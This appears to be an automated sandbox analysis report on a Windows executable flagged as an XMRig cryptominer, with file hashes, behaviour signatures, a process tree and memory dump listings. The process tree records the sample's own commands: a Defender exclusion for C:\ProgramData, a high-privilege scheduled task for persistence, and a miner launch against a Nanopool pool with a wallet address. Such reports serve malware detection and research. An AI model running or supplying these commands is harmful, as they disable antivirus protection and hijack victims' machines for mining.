Overview

overview

10

Static

static

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-12-2022 18:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe

  • Size

    2.6MB

  • MD5

    336aa18330b97fff9c99312ad63c0464

  • SHA1

    af9e917778bf2b87aabaa39a31ec6e2219928a61

  • SHA256

    d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce

  • SHA512

    0d8a65b027f619fe7d0fb186eb5fcf3e7b7c40e4ef1de8b29f548946e314ee2576aa37d1fa2c997fdaecc67c2e95f5c9b17fa8857f1628a32e601866e66184b8

  • SSDEEP

    49152:9+91DmlwRPipQJ8c6DDi6b6Yd09C0KX8Fr9JpwI1YhwnGqsGp6Ku:9+9PSS846YC3XobQ7ou

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 6 IoCs
    miner
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe
    "C:\Users\Admin\AppData\Local\Temp\d519a1465040232d67e932260f91162b8ef5b9ab9ebbe4931d83a2fe45df0fce.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4056
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4792
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2080

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2080-164-0x000001C0BB3C0000-0x000001C0BB3E0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2080-169-0x000001C0BB490000-0x000001C0BB4B0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2080-160-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2080-168-0x000001C0BB450000-0x000001C0BB470000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2080-163-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2080-167-0x000001C0BB410000-0x000001C0BB450000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2080-166-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2080-162-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/2080-170-0x000001C0BB450000-0x000001C0BB470000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2080-171-0x000001C0BB490000-0x000001C0BB4B0000-memory.dmp

    Filesize

    128KB

    Download

  • memory/2080-165-0x0000000140000000-0x00000001407C9000-memory.dmp

    Filesize

    7.8MB

    Download

  • memory/4056-150-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4056-148-0x000001663B0B0000-0x000001663B0D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4056-149-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4812-143-0x0000000000F20000-0x0000000001222000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/4812-144-0x00000000032E0000-0x0000000003323000-memory.dmp

    Filesize

    268KB

    Download

  • memory/4812-152-0x00000000032E0000-0x0000000003323000-memory.dmp

    Filesize

    268KB

    Download

  • memory/4812-153-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4812-134-0x00007FF981AC0000-0x00007FF981B5E000-memory.dmp

    Filesize

    632KB

    Download

  • memory/4812-146-0x00007FF97FB50000-0x00007FF97FB77000-memory.dmp

    Filesize

    156KB

    Download

  • memory/4812-156-0x00007FF965BC0000-0x00007FF965BF5000-memory.dmp

    Filesize

    212KB

    Download

  • memory/4812-157-0x00007FF95F3F0000-0x00007FF95F4F2000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/4812-158-0x00007FF980BF0000-0x00007FF980C5B000-memory.dmp

    Filesize

    428KB

    Download

  • memory/4812-159-0x00007FF97E7C0000-0x00007FF97E7FB000-memory.dmp

    Filesize

    236KB

    Download

  • memory/4812-145-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4812-151-0x0000000000F20000-0x0000000001222000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/4812-142-0x00007FF965170000-0x00007FF9652BE000-memory.dmp

    Filesize

    1.3MB

    Download

  • memory/4812-133-0x00007FF965380000-0x00007FF96542A000-memory.dmp

    Filesize

    680KB

    Download

  • memory/4812-141-0x0000000000F20000-0x0000000001222000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/4812-140-0x0000000000F20000-0x0000000001222000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/4812-139-0x00007FF981730000-0x00007FF98175B000-memory.dmp

    Filesize

    172KB

    Download

  • memory/4812-138-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4812-137-0x00007FF980C60000-0x00007FF980E01000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/4812-136-0x00007FF9652C0000-0x00007FF96537D000-memory.dmp

    Filesize

    756KB

    Download

  • memory/4812-135-0x00007FF97D310000-0x00007FF97D322000-memory.dmp

    Filesize

    72KB

    Download